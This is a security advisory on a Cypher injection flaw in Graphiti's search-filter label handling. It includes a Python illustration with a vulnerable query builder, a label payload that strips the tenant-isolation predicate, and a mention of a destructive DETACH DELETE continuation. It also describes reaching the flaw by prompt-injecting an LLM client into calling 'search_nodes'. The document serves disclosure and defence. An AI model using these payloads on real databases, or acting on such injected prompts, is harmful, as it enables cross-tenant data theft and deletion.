Graphiti Cypher Injection Vulnerability in Search Filters

Vulnerability

A Cypher injection vulnerability has been identified in Graphiti versions prior to 0.28.2. The issue arises from the way search filters are constructed for non-Kuzu backends: label values supplied through 'SearchFilters.node_labels' were concatenated directly into Cypher label expressions without validation, so whoever controls those values controls part of the query text sent to the database. In Graphiti MCP deployments the flaw is reachable not only by a caller with direct access to the Graphiti MCP server but also indirectly, by injecting a prompt into an LLM client so that it calls 'search_nodes' with attacker-chosen 'entity_types' values, which feed the same label construction. The affected backends are Neo4j, FalkorDB, and Neptune; Kuzu is not affected because it uses parameterized label handling.

Impact

Successful exploitation allows execution of arbitrary Cypher statements with the privileges of the database credentials Graphiti uses. An attacker can read, modify, or delete graph data, and can bypass the logical group isolation (based on 'group_ids') that is enforced only at the query layer, since the injected text can neutralize the group predicate in the same query.

Reproduction

To reproduce this vulnerability, create a 'SearchFilters' object whose node labels contain Cypher syntax (for example a closing parenthesis, a boolean operator, or a '//' comment marker) and pass it to a search function that targets a non-Kuzu backend such as Neo4j or FalkorDB. Alternatively, with an LLM client connected to a Graphiti MCP server, inject a prompt that steers the client to invoke 'search_nodes' with crafted 'entity_types' values containing Cypher syntax. Either path reaches the vulnerable label construction, and the injected text is sent to the database as part of the query.
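The following is an added illustration of the flaw described in the Vulnerability and Reproduction sections above, together with the kind of allowlist check the fix relies on. It is not Graphiti's code: the 'SearchFilters' stand-in, the query shape, the label regex and the payload are assumptions chosen to match the advisory's description (labels joined into a Cypher label expression without validation, group isolation enforced by a 'group_id' predicate in the same query).

```python
"""Constructed example for this advisory; not Graphiti's own code.

Assumed: search filters are rendered into a Cypher query of the form
MATCH (n:Entity) WHERE n:<labels> AND n.group_id IN $group_ids RETURN ...
where <labels> is the '|'-joined node label list.
"""
import re
from dataclasses import dataclass, field


@dataclass
class SearchFilters:
    """Minimal stand-in for Graphiti's SearchFilters (assumed field only)."""
    node_labels: list[str] = field(default_factory=list)


# Allowlist for label names: plain identifier characters only. Parentheses,
# pipes, quotes, backticks, whitespace and comment markers never appear in a
# legitimate label supplied through a search filter. Assumed rule for this
# example, not the exact regex used by the project.
LABEL_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")

GROUP_PREDICATE = "n.group_id IN $group_ids"


def _render(label_expr: str) -> str:
    # Multi-line on purpose: a '//' injected into the WHERE line comments out
    # only the rest of that line (the group predicate) and leaves RETURN intact.
    return (
        "MATCH (n:Entity)\n"
        f"WHERE n:{label_expr} AND {GROUP_PREDICATE}\n"
        "RETURN n.uuid AS uuid, n.name AS name"
    )


def build_node_query_vulnerable(filters: SearchFilters, group_ids: list[str]):
    """Pre-0.28.2 pattern as the advisory describes it: labels are joined and
    concatenated straight into the label expression, unvalidated."""
    label_expr = "|".join(filters.node_labels)
    return _render(label_expr), {"group_ids": group_ids}


def labels_are_safe(labels: list[str]) -> bool:
    """True if every label is a plain identifier."""
    return all(LABEL_RE.fullmatch(lbl) for lbl in labels)


def validate_labels(labels: list[str]) -> list[str]:
    """Reject the whole filter if any label fails the allowlist."""
    if not labels_are_safe(labels):
        bad = [lbl for lbl in labels if not LABEL_RE.fullmatch(lbl)]
        raise ValueError(f"invalid node label(s): {bad!r}")
    return list(labels)


def build_node_query_safe(filters: SearchFilters, group_ids: list[str]):
    """Hardened variant. Labels cannot be bound as query parameters in Neo4j,
    so the fix is an allowlist check before concatenation; group_ids remain a
    real parameter and never enter the query text."""
    label_expr = "|".join(validate_labels(filters.node_labels))
    return _render(label_expr), {"group_ids": group_ids}


def strip_line_comments(query: str) -> str:
    """Drop '//' line comments (naive: ignores '//' inside string literals)."""
    return "\n".join(line.split("//", 1)[0] for line in query.splitlines())


def group_filter_is_live(query: str) -> bool:
    """True if the group_id predicate would still execute."""
    return GROUP_PREDICATE in strip_line_comments(query)


# Constructed payload: completes the label expression, forces the WHERE clause
# true and comments out the group predicate. Via the MCP server this would
# arrive as a 'search_nodes' entity_types value.
INJECTED_LABELS = ["Entity OR true //"]


if __name__ == "__main__":
    tenant = ["tenant-a"]
    benign = SearchFilters(node_labels=["Person", "Organization"])
    print(build_node_query_vulnerable(benign, tenant)[0], "\n")

    hostile = SearchFilters(node_labels=INJECTED_LABELS)
    query, _ = build_node_query_vulnerable(hostile, tenant)
    print(query)
    print("group filter live:", group_filter_is_live(query))

    try:
        build_node_query_safe(hostile, tenant)
    except ValueError as exc:
        print("rejected:", exc)
```

With the hostile filter the vulnerable builder emits a query whose second line reads `WHERE n:Entity OR true // AND n.group_id IN $group_ids`, which is valid Cypher and returns every Entity node regardless of tenant; a payload that instead continues with `WITH n MATCH (m) DETACH DELETE m` would be destructive rather than merely cross-tenant. The hardened builder refuses the filter before any query text is built, which is the only option for labels since Cypher does not accept them as bound parameters.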

Remediation

Upgrade to Graphiti version 0.28.2 or later, which validates 'SearchFilters.node_labels' and 'group_ids' and reinforces label validation in the shared search-filter constructors. If an immediate upgrade is not possible, do not expose Graphiti MCP tools to untrusted users or to LLM workflows that process untrusted prompts, and restrict the graph database credentials Graphiti uses to the minimum privileges required (read-only where writes are not needed, and no schema or administrative rights), so that a successful injection cannot escalate beyond what the application itself may do.

Added: Mar 12, 2026, 7:21 PM
Updated: Mar 12, 2026, 7:21 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 5.0
exploitability: 7.2
remediation: 0.0
relevance: 3.8
threat: 4.8
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.